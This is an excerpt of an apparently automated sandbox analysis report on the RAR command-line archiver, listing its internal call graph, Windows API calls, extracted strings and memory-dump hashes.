39179->39417 39184 7ff6aa196d2b 39182->39184 39418 7ff6aa1b9f78 8 API calls 2 library calls 39182->39418 39184->39175 39419 7ff6aa1b9f78 8 API calls 2 library calls 39184->39419 39189 7ff6aa187167 39188->39189 39190 7ff6aa187162 39188->39190 39422 7ff6aa186c64 130 API calls _UnwindNestedFrames 39190->39422 39192->39009 39193->39001 39194->39003 39195->39011 39196->39015 39197->39013 39198->39133 39200 7ff6aa1832e9 39199->39200 39201 7ff6aa183231 39199->39201 39200->39152 39201->39200 39248 7ff6aa194380 14 API calls 39201->39248 39203 7ff6aa18329c 39203->39200 39249 7ff6aa1a2a20 22 API calls 2 library calls 39203->39249 39206 7ff6aa1970a4 39205->39206 39207 7ff6aa1970c5 39206->39207 39250 7ff6aa1a8558 10 API calls 2 library calls 39206->39250 39207->39152 39251 7ff6aa186714 39209->39251 39211 7ff6aa186836 39212 7ff6aa186853 39211->39212 39262 7ff6aa1e48c0 31 API calls _invalid_parameter_noinfo 39211->39262 39212->39152 39214 7ff6aa18684b 39214->39212 39215 7ff6aa1868a9 std::bad_alloc::bad_alloc 39214->39215 39263 7ff6aa1dba34 RtlPcToFileHeader RaiseException 39215->39263 39217 7ff6aa1868c4 39264 7ff6aa187188 12 API calls 39217->39264 39219 7ff6aa1868eb 39219->39152 39221 7ff6aa1c7a4f 39220->39221 39225 7ff6aa1c7a59 39220->39225 39221->39152 39222 7ff6aa1c7a7c 39301 7ff6aa1cb6d0 73 API calls _Init_thread_footer 39222->39301 39225->39221 39225->39222 39226 7ff6aa1c7b1c 60 API calls 39225->39226 39269 7ff6aa1c71fc 39225->39269 39302 7ff6aa1941b0 14 API calls 2 library calls 39225->39302 39226->39225 39229 7ff6aa186ee6 39228->39229 39234 7ff6aa186f5c 39228->39234 39350 7ff6aa1c9f64 8 API calls memcpy_s 39229->39350 39231 7ff6aa186efb 39232 7ff6aa186f2f 39231->39232 39231->39234 39232->39231 39351 7ff6aa187188 12 API calls 39232->39351 39234->39144 39236 7ff6aa1c6fb4 39235->39236 39237 7ff6aa1c6f8a 39235->39237 39237->39236 39238 7ff6aa1a4538 FindClose 39237->39238 39238->39237 39240 7ff6aa185742 39239->39240 39245 7ff6aa18575d 39239->39245 39240->39245 39356 
7ff6aa1b3520 12 API calls 2 library calls 39240->39356 39244 7ff6aa1857fc 39244->39152 39352 7ff6aa1b3610 39245->39352 39246 7ff6aa1b48bc 8 API calls 39246->39244 39247->39152 39248->39203 39249->39200 39250->39206 39252 7ff6aa186738 39251->39252 39261 7ff6aa1867a7 memcpy_s 39251->39261 39253 7ff6aa186765 39252->39253 39265 7ff6aa19ca6c 48 API calls 3 library calls 39252->39265 39254 7ff6aa1867e1 39253->39254 39256 7ff6aa186786 39253->39256 39254->39261 39268 7ff6aa19cb64 8 API calls 39254->39268 39256->39261 39267 7ff6aa19cb64 8 API calls 39256->39267 39257 7ff6aa186759 39266 7ff6aa19cb64 8 API calls 39257->39266 39261->39211 39262->39214 39263->39217 39264->39219 39265->39257 39275 7ff6aa1c7217 setbuf 39269->39275 39271 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39273 7ff6aa1c776f 39271->39273 39273->39225 39274 7ff6aa1c7453 39277 7ff6aa1c7464 39274->39277 39278 7ff6aa1c7476 39274->39278 39286 7ff6aa1c729c 39275->39286 39296 7ff6aa1c725a 39275->39296 39297 7ff6aa1c73c5 39275->39297 39310 7ff6aa1a4554 39275->39310 39276 7ff6aa1c76ef 39276->39296 39321 7ff6aa1a8558 10 API calls 2 library calls 39276->39321 39318 7ff6aa1c7c38 55 API calls 3 library calls 39277->39318 39281 7ff6aa1c7496 39278->39281 39307 7ff6aa1a4538 39278->39307 39293 7ff6aa1a4554 16 API calls 39281->39293 39281->39296 39282 7ff6aa1c7471 39282->39278 39285 7ff6aa1c7342 39285->39276 39285->39296 39299 7ff6aa1c7656 39285->39299 39319 7ff6aa194380 14 API calls 39285->39319 39287 7ff6aa1c73bb 39286->39287 39289 7ff6aa1c732e 39286->39289 39290 7ff6aa1da444 new 4 API calls 39287->39290 39289->39285 39292 7ff6aa1c734a 39289->39292 39290->39297 39291 7ff6aa1c737e 39291->39296 39317 7ff6aa19cbd0 75 API calls 39291->39317 39292->39291 39292->39296 39316 7ff6aa194380 14 API calls 39292->39316 39293->39296 39296->39271 39303 7ff6aa1a45cc 39297->39303 39298 7ff6aa1c7723 39320 7ff6aa18c214 8 API calls 2 library calls 39298->39320 39299->39276 39299->39296 39299->39298 39302->39225 39306 7ff6aa1a45ed 
39303->39306 39304 7ff6aa1a46b2 39304->39274 39304->39285 39305 7ff6aa1a46ec 15 API calls 39305->39306 39306->39304 39306->39305 39308 7ff6aa1a454f 39307->39308 39309 7ff6aa1a4549 FindClose 39307->39309 39308->39281 39309->39308 39311 7ff6aa1a4570 39310->39311 39312 7ff6aa1a4574 39311->39312 39322 7ff6aa1a46ec 39311->39322 39312->39286 39315 7ff6aa1a458d FindClose 39315->39312 39316->39291 39317->39296 39318->39282 39319->39299 39320->39296 39321->39296 39323 7ff6aa1a4705 setbuf 39322->39323 39324 7ff6aa1a4733 FindFirstFileW 39323->39324 39325 7ff6aa1a47a4 FindNextFileW 39323->39325 39327 7ff6aa1a4749 39324->39327 39331 7ff6aa1a478b 39324->39331 39326 7ff6aa1a47ae GetLastError 39325->39326 39325->39331 39326->39331 39335 7ff6aa1b4534 39327->39335 39330 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39334 7ff6aa1a4587 39330->39334 39331->39330 39332 7ff6aa1a475f FindFirstFileW 39332->39331 39333 7ff6aa1a477a GetLastError 39332->39333 39333->39331 39334->39312 39334->39315 39336 7ff6aa1b4549 setbuf 39335->39336 39346 7ff6aa1b45a2 39336->39346 39347 7ff6aa1b472c CharUpperW 39336->39347 39338 7ff6aa1b4579 39348 7ff6aa1b4760 CharUpperW 39338->39348 39339 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39340 7ff6aa1a475b 39339->39340 39340->39332 39340->39333 39342 7ff6aa1b4592 39343 7ff6aa1b4629 GetCurrentDirectoryW 39342->39343 39344 7ff6aa1b459a 39342->39344 39343->39346 39349 7ff6aa1b472c CharUpperW 39344->39349 39346->39339 39347->39338 39348->39342 39349->39346 39350->39231 39351->39232 39354 7ff6aa1b3626 setbuf wcschr 39352->39354 39353 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39355 7ff6aa1857e1 39353->39355 39354->39353 39355->39244 39355->39246 39356->39245 39358 7ff6aa198919 39357->39358 39383 7ff6aa1c4b14 39358->39383 39360 7ff6aa198954 __scrt_fastfail 39360->39157 39362 7ff6aa1b9199 39361->39362 39363 7ff6aa1da480 4 API calls 39362->39363 39364 7ff6aa1b91be 39363->39364 39365 7ff6aa1da444 new 4 API calls 39364->39365 39366 7ff6aa1b91cf 39365->39366 39367 
7ff6aa1b91e1 39366->39367 39368 7ff6aa1988dc 8 API calls 39366->39368 39369 7ff6aa1da444 new 4 API calls 39367->39369 39368->39367 39370 7ff6aa1b91f7 39369->39370 39371 7ff6aa1988dc 8 API calls 39370->39371 39372 7ff6aa1b9209 39370->39372 39371->39372 39372->39159 39374 7ff6aa1988dc 8 API calls 39373->39374 39375 7ff6aa1b7063 39374->39375 39376 7ff6aa1b72c0 4 API calls 39375->39376 39377 7ff6aa187325 39376->39377 39377->39162 39377->39164 39388 7ff6aa1c7d80 39378->39388 39384 7ff6aa1c4b26 39383->39384 39385 7ff6aa1c4b2b 39383->39385 39387 7ff6aa1c4b38 8 API calls _UnwindNestedFrames 39384->39387 39385->39360 39387->39385 39395 7ff6aa1c8094 39388->39395 39391 7ff6aa1a8a44 39392 7ff6aa1a8a5a __scrt_fastfail 39391->39392 39399 7ff6aa1cbac4 39392->39399 39396 7ff6aa1c809f 39395->39396 39397 7ff6aa1c7ec8 68 API calls 39396->39397 39398 7ff6aa1a896e 39397->39398 39398->39391 39402 7ff6aa1cba70 GetCurrentProcess GetProcessAffinityMask 39399->39402 39403 7ff6aa1a89c5 39402->39403 39403->39164 39407 7ff6aa1b9245 39404->39407 39406 7ff6aa1b92b1 39413 7ff6aa1a6194 72 API calls 39406->39413 39412 7ff6aa1a6194 72 API calls 39407->39412 39409 7ff6aa1b92bd 39414 7ff6aa1a6194 72 API calls 39409->39414 39411 7ff6aa1b92c9 39412->39406 39413->39409 39414->39411 39415->39176 39416->39179 39417->39182 39418->39184 39419->39173 39420->39177 39421->39175 39422->39189 39423 7ff6aa183b53 39424 7ff6aa183b64 39423->39424 39474 7ff6aa1a1e80 39424->39474 39425 7ff6aa183c09 39486 7ff6aa1a23f0 39425->39486 39427 7ff6aa183c18 39491 7ff6aa188050 157 API calls 39427->39491 39428 7ff6aa183bb6 39428->39425 39428->39427 39431 7ff6aa183c01 39428->39431 39430 7ff6aa183c90 39501 7ff6aa1cd400 48 API calls 39430->39501 39433 7ff6aa1a1c24 12 API calls 39431->39433 39432 7ff6aa183c3d 39492 7ff6aa188010 13 API calls 39432->39492 39433->39425 39435 7ff6aa183ccc 39435->39430 39499 7ff6aa1a2414 61 API calls 39435->39499 39436 7ff6aa183c45 39439 7ff6aa183c54 39436->39439 39493 7ff6aa19cba8 75 API calls 
39436->39493 39494 7ff6aa18a9d4 186 API calls wcschr 39439->39494 39440 7ff6aa183cf9 39500 7ff6aa1a1998 138 API calls 39440->39500 39444 7ff6aa183d10 39446 7ff6aa1a18ac 15 API calls 39444->39446 39445 7ff6aa183c5c 39495 7ff6aa1893ac 8 API calls 39445->39495 39446->39430 39448 7ff6aa183c66 39449 7ff6aa183c77 39448->39449 39496 7ff6aa19ca40 61 API calls _CxxThrowException 39448->39496 39497 7ff6aa188090 8 API calls 39449->39497 39452 7ff6aa183c7f 39452->39430 39498 7ff6aa19ca40 61 API calls _CxxThrowException 39452->39498 39475 7ff6aa1a1e95 setbuf 39474->39475 39476 7ff6aa1a1ecb CreateFileW 39475->39476 39477 7ff6aa1a1f59 GetLastError 39476->39477 39478 7ff6aa1a1fb8 39476->39478 39479 7ff6aa1b4534 10 API calls 39477->39479 39480 7ff6aa1a1ff7 39478->39480 39482 7ff6aa1a1fd9 SetFileTime 39478->39482 39481 7ff6aa1a1f74 39479->39481 39483 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39480->39483 39481->39478 39484 7ff6aa1a1f78 CreateFileW GetLastError 39481->39484 39482->39480 39485 7ff6aa1a203a 39483->39485 39484->39478 39485->39428 39502 7ff6aa1a24e8 39486->39502 39489 7ff6aa1a240e 39489->39435 39491->39432 39492->39436 39494->39445 39495->39448 39496->39449 39497->39452 39498->39430 39499->39440 39500->39444 39508 7ff6aa1a1af0 39502->39508 39505 7ff6aa1a23f9 39505->39489 39507 7ff6aa19ca40 61 API calls _CxxThrowException 39505->39507 39507->39489 39509 7ff6aa1a1b01 setbuf 39508->39509 39510 7ff6aa1a1b6f CreateFileW 39509->39510 39511 7ff6aa1a1b68 39509->39511 39510->39511 39512 7ff6aa1a1be1 39511->39512 39513 7ff6aa1b4534 10 API calls 39511->39513 39516 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39512->39516 39514 7ff6aa1a1bb3 39513->39514 39514->39512 39515 7ff6aa1a1bb7 CreateFileW 39514->39515 39515->39512 39517 7ff6aa1a1c14 39516->39517 39517->39505 39518 7ff6aa19ca08 10 API calls 39517->39518 39518->39505 39519 7ff6aa1e231c 39520 7ff6aa1e2342 GetModuleHandleW 39519->39520 39521 7ff6aa1e238c 39519->39521 39520->39521 39525 7ff6aa1e234f 39520->39525 39532 
7ff6aa1e6938 EnterCriticalSection 39521->39532 39523 7ff6aa1e6998 fflush LeaveCriticalSection 39524 7ff6aa1e2460 39523->39524 39527 7ff6aa1e246c 39524->39527 39531 7ff6aa1e2488 11 API calls 39524->39531 39525->39521 39533 7ff6aa1e24d4 GetModuleHandleExW 39525->39533 39526 7ff6aa1e2410 39526->39523 39528 7ff6aa1e43b8 16 API calls 39528->39526 39530 7ff6aa1e2396 39530->39526 39530->39528 39531->39527 39534 7ff6aa1e2525 39533->39534 39535 7ff6aa1e24fe GetProcAddress 39533->39535 39536 7ff6aa1e2535 39534->39536 39537 7ff6aa1e252f FreeLibrary 39534->39537 39535->39534 39538 7ff6aa1e2518 39535->39538 39536->39521 39537->39536 39538->39534 39539 7ff6aa1db0fc 39558 7ff6aa1daa8c 39539->39558 39543 7ff6aa1db123 __scrt_acquire_startup_lock 39544 7ff6aa1db148 39543->39544 39614 7ff6aa1db52c 7 API calls __scrt_fastfail 39543->39614 39548 7ff6aa1db169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39544->39548 39566 7ff6aa1e472c 39544->39566 39547 7ff6aa1db16d 39548->39547 39549 7ff6aa1db1f7 39548->39549 39615 7ff6aa1e2574 35 API calls __FrameUnwindToState 39548->39615 39570 7ff6aa1e3fc4 39549->39570 39556 7ff6aa1db220 39616 7ff6aa1dac64 8 API calls 2 library calls 39556->39616 39559 7ff6aa1daaae __isa_available_init 39558->39559 39617 7ff6aa1de2f8 39559->39617 39562 7ff6aa1daab7 39562->39543 39613 7ff6aa1db52c 7 API calls __scrt_fastfail 39562->39613 39568 7ff6aa1e4744 39566->39568 39567 7ff6aa1e4766 39567->39548 39568->39567 39666 7ff6aa1db010 39568->39666 39571 7ff6aa1e3fd4 39570->39571 39572 7ff6aa1db20c 39570->39572 39751 7ff6aa1e3c84 39571->39751 39574 7ff6aa1b7e20 39572->39574 39783 7ff6aa1cb470 GetModuleHandleW 39574->39783 39580 7ff6aa1b7e58 SetErrorMode GetModuleHandleW 39581 7ff6aa1c48cc 21 API calls 39580->39581 39582 7ff6aa1b7e7d 39581->39582 39583 7ff6aa1c3e48 137 API calls 39582->39583 39584 7ff6aa1b7e90 39583->39584 39585 7ff6aa193d3c 126 API calls 39584->39585 39586 7ff6aa1b7e9c 39585->39586 39587 7ff6aa1da444 new RtlPcToFileHeader 
RaiseException EnterCriticalSection LeaveCriticalSection 39586->39587 39588 7ff6aa1b7ead 39587->39588 39589 7ff6aa193f18 70 API calls 39588->39589 39590 7ff6aa1b7ebf 39588->39590 39589->39590 39591 7ff6aa194d1c 157 API calls 39590->39591 39592 7ff6aa1b7ed6 39591->39592 39593 7ff6aa1b7eef 39592->39593 39595 7ff6aa196ad0 154 API calls 39592->39595 39594 7ff6aa194d1c 157 API calls 39593->39594 39596 7ff6aa1b7eff 39594->39596 39597 7ff6aa1b7ee7 39595->39597 39598 7ff6aa1b7f0d 39596->39598 39601 7ff6aa1b7f14 39596->39601 39599 7ff6aa194e48 160 API calls 39597->39599 39600 7ff6aa1cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39598->39600 39599->39593 39600->39601 39602 7ff6aa194888 58 API calls 39601->39602 39603 7ff6aa1b7f57 39602->39603 39604 7ff6aa194fd0 268 API calls 39603->39604 39606 7ff6aa1b7f5f 39604->39606 39605 7ff6aa1b7f9e 39611 7ff6aa1db684 GetModuleHandleW 39605->39611 39606->39605 39607 7ff6aa1b7f8c 39606->39607 39608 7ff6aa1cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39607->39608 39609 7ff6aa1b7f93 39608->39609 39609->39605 39610 7ff6aa1cb57c 14 API calls 39609->39610 39610->39605 39612 7ff6aa1db698 39611->39612 39612->39556 39613->39543 39614->39544 39615->39549 39616->39547 39618 7ff6aa1de301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39617->39618 39630 7ff6aa1deb08 39618->39630 39621 7ff6aa1daab3 39621->39562 39625 7ff6aa1e45e4 39621->39625 39623 7ff6aa1de318 39623->39621 39637 7ff6aa1deb50 DeleteCriticalSection 39623->39637 39627 7ff6aa1e9d4c 39625->39627 39626 7ff6aa1daac0 39626->39562 39629 7ff6aa1de32c 8 API calls 3 library calls 39626->39629 39627->39626 39654 7ff6aa1e66c0 39627->39654 39629->39562 39631 7ff6aa1deb10 39630->39631 39633 7ff6aa1deb41 39631->39633 39634 7ff6aa1de30b 39631->39634 39638 7ff6aa1de678 39631->39638 39643 7ff6aa1deb50 DeleteCriticalSection 39633->39643 39634->39621 39636 7ff6aa1de8a4 8 API calls 3 library calls 39634->39636 39636->39623 
39637->39621 39644 7ff6aa1de34c 39638->39644 39641 7ff6aa1de6cf InitializeCriticalSectionAndSpinCount 39642 7ff6aa1de6bb 39641->39642 39642->39631 39643->39634 39645 7ff6aa1de3ad 39644->39645 39646 7ff6aa1de3b2 39644->39646 39645->39646 39647 7ff6aa1de3e5 LoadLibraryExW 39645->39647 39652 7ff6aa1de47a 39645->39652 39653 7ff6aa1de458 FreeLibrary 39645->39653 39646->39641 39646->39642 39647->39645 39649 7ff6aa1de40b GetLastError 39647->39649 39648 7ff6aa1de489 GetProcAddress 39648->39646 39650 7ff6aa1de4a1 39648->39650 39649->39645 39651 7ff6aa1de416 LoadLibraryExW 39649->39651 39650->39646 39651->39645 39652->39646 39652->39648 39653->39645 39665 7ff6aa1e6938 EnterCriticalSection 39654->39665 39656 7ff6aa1e66d0 39657 7ff6aa1e8050 32 API calls 39656->39657 39658 7ff6aa1e66d9 39657->39658 39659 7ff6aa1e66e7 39658->39659 39660 7ff6aa1e64d0 34 API calls 39658->39660 39661 7ff6aa1e6998 fflush LeaveCriticalSection 39659->39661 39663 7ff6aa1e66e2 39660->39663 39662 7ff6aa1e66f3 39661->39662 39662->39627 39664 7ff6aa1e65bc GetStdHandle GetFileType 39663->39664 39664->39659 39667 7ff6aa1db020 pre_c_initialization 39666->39667 39687 7ff6aa1e2b00 39667->39687 39669 7ff6aa1db02c pre_c_initialization 39693 7ff6aa1daad8 39669->39693 39671 7ff6aa1db045 39672 7ff6aa1db0b5 39671->39672 39673 7ff6aa1db049 _RTC_Initialize 39671->39673 39730 7ff6aa1db52c 7 API calls __scrt_fastfail 39672->39730 39698 7ff6aa1dace0 39673->39698 39675 7ff6aa1db0bf 39731 7ff6aa1db52c 7 API calls __scrt_fastfail 39675->39731 39678 7ff6aa1db05a pre_c_initialization 39701 7ff6aa1e3b0c 39678->39701 39679 7ff6aa1db0ca __scrt_initialize_default_local_stdio_options 39679->39568 39682 7ff6aa1db06a 39729 7ff6aa1db7dc RtlInitializeSListHead 39682->39729 39684 7ff6aa1db06f pre_c_initialization 39685 7ff6aa1e4818 pre_c_initialization 35 API calls 39684->39685 39686 7ff6aa1db09a pre_c_initialization 39685->39686 39686->39568 39688 7ff6aa1e2b11 39687->39688 39689 7ff6aa1e2b19 39688->39689 39732 7ff6aa1e4f3c 15 API calls 
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: d9267d89115f5de78b3842f1af3ecfa081f81c527df62ab55ef27389ace7813b
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: E6C2D53290F182E1EA269F2482441BDA791AF01794FD844BBCA2ED72C5DE6DFD47D360
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: 76a21640ef4bcccfa9a7efadb4a2dc46ecd4c92dd8f64b01b83c3229c4f9755b
• Instruction ID: a27c43ede710ac0b7fc573ae7f84dba0b1e4850391e18dc5db46cdd59d19a1c9
• Opcode Fuzzy Hash: 76a21640ef4bcccfa9a7efadb4a2dc46ecd4c92dd8f64b01b83c3229c4f9755b
• Instruction Fuzzy Hash: 78E2E126A0AAC2E5EB22DF25C8401FD27A2FB59788F4540B7CA5D87796DF3DD946C300

Control-flow Graph

APIs
• Part of subcall function 00007FF6AA1C4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6AA19CC90), ref: 00007FF6AA1C4AF5
• GetModuleFileNameW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C492E
• GetVersionExW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C496A
• LoadLibraryExW.KERNELBASE(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4993
• LoadLibraryW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C499F
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• API String ID: 2520153904-1675521814
• Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction ID: ddd01e97a45bf51e1714abada74a8e597cfd52db01349efc5d252a6a6db3b370
• Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction Fuzzy Hash: 4131903171AA92E5FB668F21E8442E923A1FB45784F848077EA4D83698DF3CED57C700

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A4736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A476B
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A47A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A47B2
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
• Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction ID: fb65e0763086a5658b48b40d6e5944de26f9f1adfd1aa0067d21bf21ba687a87
• Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction Fuzzy Hash: F541C732B0A6C1E6DA659B65E4402E963A0FB497B4F404372EA7D833C5DF7CE95A8700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1815803762-0
                                                                                                                                                                                                                                        • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
